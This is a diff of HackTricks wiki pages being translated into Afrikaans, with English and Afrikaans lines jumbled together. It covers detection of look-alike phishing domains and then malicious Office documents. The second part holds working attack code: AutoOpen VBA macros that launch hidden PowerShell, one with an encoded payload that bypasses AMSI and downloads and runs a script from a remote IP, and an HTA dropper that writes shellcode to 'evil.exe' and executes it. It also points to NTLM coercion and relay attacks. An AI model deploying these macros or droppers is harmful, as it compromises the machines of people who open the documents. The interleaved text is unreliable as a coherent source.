* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
</details>
## Introduction
## Inleiding
To detect a phishing attempt it's important to **understand the phishing techniques that are being used nowadays**. On the parent page of this post, you can find this information, so if you aren't aware of which techniques are being used today I recommend you to go to the parent page and read at least that section.
Om 'n phising-poging op te spoor, is dit belangrik om **die phising-tegnieke wat tans gebruik word, te verstaan**. Op die ouerbladsy van hierdie pos kan jy hierdie inligting vind, so as jy nie bewus is van watter tegnieke vandag gebruik word nie, sal ek aanbeveel dat jy na die ouerbladsy gaan en ten minste daardie afdeling lees.
This post is based on the idea that the **attackers will try to somehow mimic or use the victim's domain name**. If your domain is called `example.com` and you are phished using a completely different domain name for some reason like `youwonthelottery.com`, these techniques aren't going to uncover it.
Hierdie pos is gebaseer op die idee dat die **aanvallers op een of ander manier die domeinnaam van die slagoffer sal probeer naboots of gebruik**. As jou domein `example.com` genoem word en jy ge-phish word deur 'n heeltemal ander domeinnaam vir 'n rede soos `youwonthelottery.com`, sal hierdie tegnieke dit nie ontbloot nie.
## Domain name variations
## Variasies van domeinname
It's kind of **easy** to **uncover** those **phishing** attempts that will use a **similar domain** name inside the email.\
It's enough to **generate a list of the most probable phishing names** that an attacker may use and **check** if it's **registered** or just check if there is any **IP** using it.
Dit is redelik **maklik** om daardie **phising-pogings** wat 'n **soortgelyke domeinnaam** binne die e-pos gebruik, **te ontbloot**.\
Dit is genoeg om 'n lys van die mees waarskynlike phisingname te **genereer** wat 'n aanvaller kan gebruik en te **kyk** of dit **geregistreer** is of net te kyk of daar enige **IP** is wat dit gebruik.
### Finding suspicious domains
### Verdagte domeine vind
For this purpose, you can use any of the following tools. Note that these tolls will also perform DNS requests automatically to check if the domain has any IP assigned to it:
Vir hierdie doel kan jy enige van die volgende hulpmiddels gebruik. Let daarop dat hierdie hulpmiddels outomaties DNS-versoeke sal doen om te kyk of die domein 'n IP daaraan toegewys het:
* [**dnstwist**](https://github.com/elceef/dnstwist)
* [**urlcrazy**](https://github.com/urbanadventurer/urlcrazy)
### Bitflipping
**You can find a short the explanation of this technique in the parent page. Or read the original research in [https://www.bleepingcomputer.com/news/security/hijacking-traffic-to-microsoft-s-windowscom-with-bitflipping/](https://www.bleepingcomputer.com/news/security/hijacking-traffic-to-microsoft-s-windowscom-with-bitflipping/)**
**Jy kan 'n kort verduideliking van hierdie tegniek op die ouerbladsy vind. Of lees die oorspronklike navorsing by [https://www.bleepingcomputer.com/news/security/hijacking-traffic-to-microsoft-s-windowscom-with-bitflipping/](https://www.bleepingcomputer.com/news/security/hijacking-traffic-to-microsoft-s-windowscom-with-bitflipping/)**
Byvoorbeeld, 'n 1-bit-wysiging in die domein microsoft.com kan dit omskep in _windnws.com._\
**Aanvallers kan soveel moontlike bitflipping-domeine registreer wat verband hou met die slagoffer om legitieme gebruikers na hul infrastruktuur om te lei**.
For example, a 1 bit modification in the domain microsoft.com can transform it into _windnws.com._\
**Attackers may register as many bit-flipping domains as possible related to the victim to redirect legitimate users to their infrastructure**.
**Alle moontlike bitflipping-domeinname moet ook gemonitor word.**
### Basiese kontroles
**All possible bit-flipping domain names should be also monitored.**
Sodra jy 'n lys potensiële verdagte domeinname het, moet jy dit **ondersoek** (veral die poorte HTTP en HTTPS) om te **sien of hulle 'n soortgelyke aanmeldingsvorm gebruik** as een van die slagoffer se domeine.\
Jy kan ook poort 3333 ondersoek om te sien of dit oop is en 'n instansie van `gophish` uitvoer.\
Dit is ook interessant om te weet **hoe oud elke ontdekte verdagte domein is**, hoe jonger dit is, hoe gevaarliker dit is.\
Jy kan ook **skermskote** van die HTTP- en/of HTTPS-verdagte webblad kry om te sien of dit verdag is en in daardie geval **toegang daartoe neem om 'n dieper kyk te neem**.
### Basic checks
### Gevorderde kontroles
Once you have a list of potential suspicious domain names you should **check** them (mainly the ports HTTP and HTTPS) to **see if they are using some login form similar** to someone of the victim's domain.\
You could also check port 3333 to see if it's open and running an instance of `gophish`.\
It's also interesting to know **how old each discovered suspicions domain is**, the younger it's the riskier it is.\
You can also get **screenshots** of the HTTP and/or HTTPS suspicious web page to see if it's suspicious and in that case **access it to take a deeper look**.
As jy 'n stap verder wil gaan, sal ek aanbeveel dat jy **hierdie verdagte domeine monitor en gereeld soek na meer** (elke dag? dit neem slegs 'n paar sekondes/minute). Jy moet ook die **oop poorte** van die betrokke IP's **ondersoek** en **soek na instansies van `gophish` of soortgelyke hulpmiddels** (ja, aanvallers maak ook foute) en **monitor die HTTP- en HTTPS-webblaaie van die verdagte domeine en subdomeine** om te sien of hulle enige aanmeldingsvorm van die slagoffer se webblaaie gekopieer het.\
Om dit te **outomatiseer**, sal ek aanbeveel om 'n lys van aanmeldingsvorms van die slagoffer se domeine te hê, die verdagte webblaaie te spider en elke aanmeldingsvorm wat binne die verdagte domeine gevind is, te vergelyk met elke aanmeldingsvorm van die slagoffer se domein deur iets soos `ssdeep` te gebruik.\
As jy die aanmeldingsvorms van die verdagte domeine gelokaliseer het, kan jy probeer om **rommelgeloofsbriewe te stuur** en **kyk of dit jou na die slagoffer se domein omskakel**.
### Advanced checks
## Domeinname met sleutelwoorde
If you want to go one step further I would recommend you to **monitor those suspicious domains and search for more** once in a while (every day? it only takes a few seconds/minutes). You should also **check** the open **ports** of the related IPs and **search for instances of `gophish` or similar tools** (yes, attackers also make mistakes) and **monitor the HTTP and HTTPS web pages of the suspicious domains and subdomains** to see if they have copied any login form from the victim's web pages.\
In order to **automate this** I would recommend having a list of login forms of the victim's domains, spider the suspicious web pages and comparing each login form found inside the suspicious domains with each login form of the victim's domain using something like `ssdeep`.\
If you have located the login forms of the suspicious domains, you can try to **send junk credentials** and **check if it's redirecting you to the victim's domain**.
Die ouerbladsy noem ook 'n tegniek vir die variasie van domeinname wat bestaan uit die plaas van die **slagoffer se domeinnaam binne 'n groter domein** (bv. paypal-financial.com vir paypal.com).
## Domain names using keywords
### Sertifikaattransparansie
The parent page also mentions a domain name variation technique that consists of putting the **victim's domain name inside a bigger domain** (e.g. paypal-financial.com for paypal.com).
Dit is nie moontlik om die vorige "Brute-Force" benadering te gebruik nie, maar dit is eintlik **moontlik om sulke phising-pogings te ontbloot** danksy sertifikaattransparansie. Telkens wanneer 'n sertifikaat deur 'n CA uitgereik word, word die besonderhede openbaar gemaak. Dit beteken dat deur die sertifikaattransparansie te lees of selfs te monitor, dit **moontlik is om domeine te vind wat 'n sleutelwoord binne hul naam gebruik**. Byvoorbeeld, as 'n aanvaller 'n sertifikaat genereer vir [https://paypal-financial.com](https://paypal-financial.com), is dit moontlik om die sleutelwoord "paypal" in die sertifikaat te vind en te weet dat 'n verdagte e-pos gebruik word.
### Certificate Transparency
It's not possible to take the previous "Brute-Force" approach but it's actually **possible to uncover such phishing attempts** also thanks to certificate transparency. Every time a certificate is emitted by a CA, the details are made public. This means that by reading the certificate transparency or even monitoring it, it's **possible to find domains that are using a keyword inside its name** For example, if an attacker generates a certificate of [https://paypal-financial.com](https://paypal-financial.com), seeing the certificate it's possible to find the keyword "paypal" and know that suspicious email is being used.
The post [https://0xpatrik.com/phishing-domains/](https://0xpatrik.com/phishing-domains/) suggests that you can use Censys to search for certificates affecting a specific keyword and filter by date (only "new" certificates) and by the CA issuer "Let's Encrypt":
Die pos [https://0xpatrik.com/phishing-domains/](https://0xpatrik.com/phishing-domains/) stel voor dat jy Censys kan gebruik om te soek na sertifikate wat 'n spesifieke sleutelwoord affekteer en te filter volgens datum (slegs "nuwe" sertifikate) en volgens die CA-uitreiker "Let's Encrypt":
![https://0xpatrik.com/content/images/2018/07/cert_listing.png](<../../.gitbook/assets/image (390).png>)
However, you can do "the same" using the free web [**crt.sh**](https://crt.sh). You can **search for the keyword** and the **filter** the results **by date and CA** if you wish.
Jy kan egter "dieselfde" doen deur die gratis webwerf [**crt.sh**](https://crt.sh) te gebruik. Jy kan **soek na die sleutelwoord** en die resultate **filter** volgens datum en CA as jy wil.
![](<../../.gitbook/assets/image (391).png>)
Using this last option you can even use the field Matching Identities to see if any identity from the real domain matches any of the suspicious domains (note that a suspicious domain can be a false positive).
Met hierdie laaste opsie kan jy selfs die veld "Matching Identities" gebruik om te sien of enige identiteit van die werklike domein ooreenstem met enige van die verdagte domeine (let daarop dat 'n verdagte domein 'n vals positief kan wees).
**Another alternative** is the fantastic project called [**CertStream**](https://medium.com/cali-dog-security/introducing-certstream-3fc13bb98067). CertStream provides a real-time stream of newly generated certificates which you can use to detect specified keywords in (near) real-time. In fact, there is a project called [**phishing\_catcher**](https://github.com/x0rz/phishing\_catcher) that does just that.
**'n Ander alternatief** is die fantastiese projek genaamd [**CertStream**](https://medium.com/cali-dog-security/introducing-certstream-3fc13bb98067). CertStream bied 'n stroom van nuut gegenereerde sertifikate in werklike tyd wat jy kan gebruik om gespesifiseerde sleutelwoorde in (byna) werklike tyd op te spoor. In werklikheid is daar 'n projek genaamd [**phishing\_catcher**](https://github.com/x0rz/phishing\_catcher) wat presies dit doen.
### **Nuwe domeine**
### **New domains**
**One last alternative** is to gather a list of **newly registered domains** for some TLDs ([Whoxy](https://www.whoxy.com/newly-registered-domains/) provides such service) and **check the keywords in these domains**. However, long domains usually use one or more subdomains, therefore the keyword won't appear inside the FLD and you won't be able to find the phishing subdomain.
**Een laaste alternatief** is om 'n lys van **nuut geregistreerde domeine** vir sommige TLD's ([Whoxy](https://www.whoxy.com/newly-registered-domains/) bied so 'n diens) te versamel en **die sleutelwoorde in hierdie domeine te ondersoek**. Tog gebruik lang domeine gewoonlik een of meer subdomeine, dus sal die sleutelwoord nie binne die FLD verskyn nie en sal jy nie die phising subdomein kan vind nie.
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
</details>

188
generic-methodologies-and-resources/phishing-methodology/phishing-documents.md
View file

@ -1,65 +1,60 @@
# Phishing Files & Documents
# Phishing Lêers & Dokumente
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks-repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud-repo](https://github.com/carlospolop/hacktricks-cloud)**.
</details>
## Office Documents
## Kantoor Dokumente
Microsoft Word performs file data validation before opening a file. Data validation is performed in the form of data structure identification, against the OfficeOpenXML standard. If any error occurs during the data structure identification, the file being analysed will not be opened.
Microsoft Word voer data-validering uit voordat 'n lêer geopen word. Data-validering word uitgevoer in die vorm van datastruktuur-identifikasie, teen die OfficeOpenXML-standaard. As enige fout tydens die identifikasie van die datastruktuur voorkom, sal die geanaliseerde lêer nie geopen word nie.
Usually, Word files containing macros use the `.docm` extension. However, it's possible to rename the file by changing the file extension and still keep their macro executing capabilities.\
For example, an RTF file does not support macros, by design, but a DOCM file renamed to RTF will be handled by Microsoft Word and will be capable of macro execution.\
The same internals and mechanisms apply to all software of the Microsoft Office Suite (Excel, PowerPoint etc.).
You can use the following command to check which extensions are going to be executed by some Office programs:
Gewoonlik gebruik Word-lêers wat makros bevat die `.docm`-uitbreiding. Dit is egter moontlik om die lêer te hernoem deur die lêeruitbreiding te verander en steeds hul makro-uitvoeringsvermoë te behou.\
Byvoorbeeld, 'n RTF-lêer ondersteun nie makros, volgens ontwerp nie, maar 'n DOCM-lêer wat na RTF hernoem word, sal deur Microsoft Word hanteer word en in staat wees om makros uit te voer.\
Dieselfde interne en meganismes geld vir alle sagteware van die Microsoft Office Suite (Excel, PowerPoint ens.).
Jy kan die volgende bevel gebruik om te kyk watter uitbreidings deur sommige Office-programme uitgevoer gaan word:
```bash
assoc | findstr /i "word excel powerp"
```
### Eksterne Beeld Laai
DOCX files referencing a remote template (File Options Add-ins Manage: Templates Go) that includes macros can “execute” macros as well.
### External Image Load
Go to: _Insert --> Quick Parts --> Field_\
_**Categories**: Links and References, **Filed names**: includePicture, and **Filename or URL**:_ http://\<ip>/whatever
Gaan na: _Invoeg --> Vinnige Dele --> Veld_\
_**Kategorieë**: Skakels en Verwysings, **Veldname**: includePicture, en **Lêernaam of URL**:_ http://\<ip>/whatever
![](<../../.gitbook/assets/image (316).png>)
### Macros Backdoor
### Agterdeur vir Makro's
It's possible to use macros to run arbitrary code from the document.
Dit is moontlik om makro's te gebruik om willekeurige kode vanuit die dokument uit te voer.
#### Autoload functions
#### Outomatiese Laai Funksies
The more common they are, the more probable the AV will detect them.
Hoe algemener hulle is, hoe waarskynlik sal die AV dit opspoor.
* AutoOpen()
* Document\_Open()
#### Macros Code Examples
#### Voorbeelde van Makro Kode
```vba
Sub AutoOpen()
CreateObject("WScript.Shell").Exec ("powershell.exe -nop -Windowstyle hidden -ep bypass -enc JABhACAAPQAgACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAJwA7ACQAYgAgAD0AIAAnAG0AcwAnADsAJAB1ACAAPQAgACcAVQB0AGkAbABzACcACgAkAGEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAKAAnAHsAMAB9AHsAMQB9AGkAewAyAH0AJwAgAC0AZgAgACQAYQAsACQAYgAsACQAdQApACkAOwAKACQAZgBpAGUAbABkACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQARgBpAGUAbABkACgAKAAnAGEAewAwAH0AaQBJAG4AaQB0AEYAYQBpAGwAZQBkACcAIAAtAGYAIAAkAGIAKQAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkAOwAKACQAZgBpAGUAbABkAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJAB0AHIAdQBlACkAOwAKAEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAwAC4AMQAxAC8AaQBwAHMALgBwAHMAMQAnACkACgA=")
CreateObject("WScript.Shell").Exec ("powershell.exe -nop -Windowstyle hidden -ep bypass -enc JABhACAAPQAgACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAJwA7ACQAYgAgAD0AIAAnAG0AcwAnADsAJAB1ACAAPQAgACcAVQB0AGkAbABzACcACgAkAGEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAKAAnAHsAMAB9AHsAMQB9AGkAewAyAH0AJwAgAC0AZgAgACQAYQAsACQAYgAsACQAdQApACkAOwAKACQAZgBpAGUAbABkACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQARgBpAGUAbABkACgAKAAnAGEAewAwAH0AaQBJAG4AaQB0AEYAYQBpAGwAZQBkACcAIAAtAGYAIAAkAGIAKQAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkAOwAKACQAZgBpAGUAbABkAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJAB0AHIAdQBlACkAOwAKAEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAwAC4AMQAxAC8AaQBwAHMALgBwAHMAMQAnACkACgA=")
End Sub
```
```vba
Sub AutoOpen()
Dim Shell As Object
Set Shell = CreateObject("wscript.shell")
Shell.Run "calc"
Dim Shell As Object
Set Shell = CreateObject("wscript.shell")
Shell.Run "calc"
End Sub
```
@ -68,8 +63,8 @@ End Sub
Dim author As String
author = oWB.BuiltinDocumentProperties("Author")
With objWshell1.Exec("powershell.exe -nop -Windowsstyle hidden -Command-")
.StdIn.WriteLine author
.StdIn.WriteBlackLines 1
.StdIn.WriteLine author
.StdIn.WriteBlackLines 1
```
```vba
@ -77,88 +72,85 @@ Dim proc As Object
Set proc = GetObject("winmgmts:\\.\root\cimv2:Win32_Process")
proc.Create "powershell <beacon line generated>
```
#### Verwyder handmatig metadata
#### Manually remove metadata
Gaan na **Lêer > Inligting > Inspekteer Dokument > Inspekteer Dokument**, wat die Dokument Inspekteerder sal oopmaak. Klik op **Inspekteer** en dan **Verwyder Alles** langs **Dokumenteienskappe en Persoonlike Inligting**.
Fo to **File > Info > Inspect Document > Inspect Document**, which will bring up the Document Inspector. Click **Inspect** and then **Remove All** next to **Document Properties and Personal Information**.
#### Dokumentuitbreiding
#### Doc Extension
Wanneer jy klaar is, kies die **Stoor as tipe**-keuselys, verander die formaat van **`.docx`** na **Word 97-2003 `.doc`**.\
Doen dit omdat jy **nie makro's binne 'n `.docx` kan stoor nie** en daar is 'n **stigma** **rondom** die makro-geaktiveerde **`.docm`**-uitbreiding (bv. die duimnaelsimbool het 'n groot `!` en sommige web-/e-poshekke blokkeer dit heeltemal). Daarom is hierdie **oudmodiese `.doc`-uitbreiding die beste kompromie**.
When finished, select **Save as type** dropdown, change the format from **`.docx`** to **Word 97-2003 `.doc`**.\
Do this because you **can't save macro's inside a `.docx`** and there's a **stigma** **around** the macro-enabled **`.docm`** extension (e.g. the thumbnail icon has a huge `!` and some web/email gateway block them entirely). Therefore, this **legacy `.doc` extension is the best compromise**.
#### Malicious Macros Generators
#### Kwaadwillige Makro-Generator
* MacOS
* [**macphish**](https://github.com/cldrn/macphish)
* [**Mythic Macro Generator**](https://github.com/cedowens/Mythic-Macro-Generator)
* [**macphish**](https://github.com/cldrn/macphish)
* [**Mythic Macro Generator**](https://github.com/cedowens/Mythic-Macro-Generator)
## HTA Files
## HTA-lêers
An HTA is a Windows program that **combines HTML and scripting languages (such as VBScript and JScript)**. It generates the user interface and executes as a "fully trusted" application, without the constraints of a browser's security model.
An HTA is executed using **`mshta.exe`**, which is typically **installed** along with **Internet Explorer**, making **`mshta` dependant on IE**. So if it has been uninstalled, HTAs will be unable to execute.
'n HTA is 'n Windows-program wat **HTML en skripsietale (soos VBScript en JScript)** kombineer. Dit genereer die gebruikerskoppelvlak en voer uit as 'n "volledig vertroude" toepassing, sonder die beperkings van 'n blaaier se sekuriteitsmodel.
'n HTA word uitgevoer met behulp van **`mshta.exe`**, wat tipies **geïnstalleer** word saam met **Internet Explorer**, wat **`mshta` afhanklik maak van IE**. As dit egter gedeïnstalleer is, sal HTA's nie kan uitvoer nie.
```html
<--! Basic HTA Execution -->
<html>
<head>
<title>Hello World</title>
</head>
<body>
<h2>Hello World</h2>
<p>This is an HTA...</p>
</body>
<head>
<title>Hello World</title>
</head>
<body>
<h2>Hello World</h2>
<p>This is an HTA...</p>
</body>
<script language="VBScript">
Function Pwn()
Set shell = CreateObject("wscript.Shell")
shell.run "calc"
End Function
<script language="VBScript">
Function Pwn()
Set shell = CreateObject("wscript.Shell")
shell.run "calc"
End Function
Pwn
</script>
Pwn
</script>
</html>
```
```html
<--! Cobal Strike generated HTA without shellcode -->
<script language="VBScript">
Function var_func()
var_shellcode = "<shellcode>"
Function var_func()
var_shellcode = "<shellcode>"
Dim var_obj
Set var_obj = CreateObject("Scripting.FileSystemObject")
Dim var_stream
Dim var_tempdir
Dim var_tempexe
Dim var_basedir
Set var_tempdir = var_obj.GetSpecialFolder(2)
var_basedir = var_tempdir & "\" & var_obj.GetTempName()
var_obj.CreateFolder(var_basedir)
var_tempexe = var_basedir & "\" & "evil.exe"
Set var_stream = var_obj.CreateTextFile(var_tempexe, true , false)
For i = 1 to Len(var_shellcode) Step 2
var_stream.Write Chr(CLng("&H" & Mid(var_shellcode,i,2)))
Next
var_stream.Close
Dim var_shell
Set var_shell = CreateObject("Wscript.Shell")
var_shell.run var_tempexe, 0, true
var_obj.DeleteFile(var_tempexe)
var_obj.DeleteFolder(var_basedir)
End Function
Dim var_obj
Set var_obj = CreateObject("Scripting.FileSystemObject")
Dim var_stream
Dim var_tempdir
Dim var_tempexe
Dim var_basedir
Set var_tempdir = var_obj.GetSpecialFolder(2)
var_basedir = var_tempdir & "\" & var_obj.GetTempName()
var_obj.CreateFolder(var_basedir)
var_tempexe = var_basedir & "\" & "evil.exe"
Set var_stream = var_obj.CreateTextFile(var_tempexe, true , false)
For i = 1 to Len(var_shellcode) Step 2
var_stream.Write Chr(CLng("&H" & Mid(var_shellcode,i,2)))
Next
var_stream.Close
Dim var_shell
Set var_shell = CreateObject("Wscript.Shell")
var_shell.run var_tempexe, 0, true
var_obj.DeleteFile(var_tempexe)
var_obj.DeleteFolder(var_basedir)
End Function
var_func
self.close
var_func
self.close
</script>
```
## Dwangmatige NTLM-verifikasie
## Forcing NTLM Authentication
Daar is verskeie maniere om **NTLM-verifikasie "op afstand" af te dwing**, byvoorbeeld deur **onsigbare beelde** by e-posse of HTML in te voeg wat die gebruiker sal toegang (selfs HTTP MitM?). Of stuur die slagoffer die **adres van lêers** wat 'n **verifikasie sal veroorsaak** net vir die **oopmaak van die vouer**.
There are several ways to **force NTLM authentication "remotely"**, for example, you could add **invisible images** to emails or HTML that the user will access (even HTTP MitM?). Or send the victim the **address of files** that will **trigger** an **authentication** just for **opening the folder.**
**Check these ideas and more in the following pages:**
**Kyk na hierdie idees en meer op die volgende bladsye:**
{% content-ref url="../../windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md" %}
[printers-spooler-service-abuse.md](../../windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md)
@ -168,21 +160,21 @@ There are several ways to **force NTLM authentication "remotely"**, for example,
[places-to-steal-ntlm-creds.md](../../windows-hardening/ntlm/places-to-steal-ntlm-creds.md)
{% endcontent-ref %}
### NTLM Relay
### NTLM-oordrag
Don't forget that you cannot only steal the hash or the authentication but also **perform NTLM relay attacks**:
Moenie vergeet dat jy nie net die hasie of die verifikasie kan steel nie, maar ook **NTLM-oordragaanvalle kan uitvoer**:
* [**NTLM Relay attacks**](../pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#ntml-relay-attack)
* [**AD CS ESC8 (NTLM relay to certificates)**](../../windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md#ntlm-relay-to-ad-cs-http-endpoints-esc8)
* [**NTLM-oordragaanvalle**](../pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#ntml-relay-attack)
* [**AD CS ESC8 (NTLM-oordrag na sertifikate)**](../../windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md#ntlm-relay-to-ad-cs-http-endpoints-esc8)
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
* Werk jy in 'n **cybersekuriteitsmaatskappy**? Wil jy jou **maatskappy geadverteer sien in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of HackTricks aflaai in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com)
* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Deel jou haktruuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
</details>

50
generic-methodologies-and-resources/python/README.md
View file

@ -1,53 +1,53 @@
# Python Sandbox Escape & Pyscript
# Python Sandbox Ontsnapping & Pyscript
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking vanaf nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Andere manieren om HackTricks te ondersteunen:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
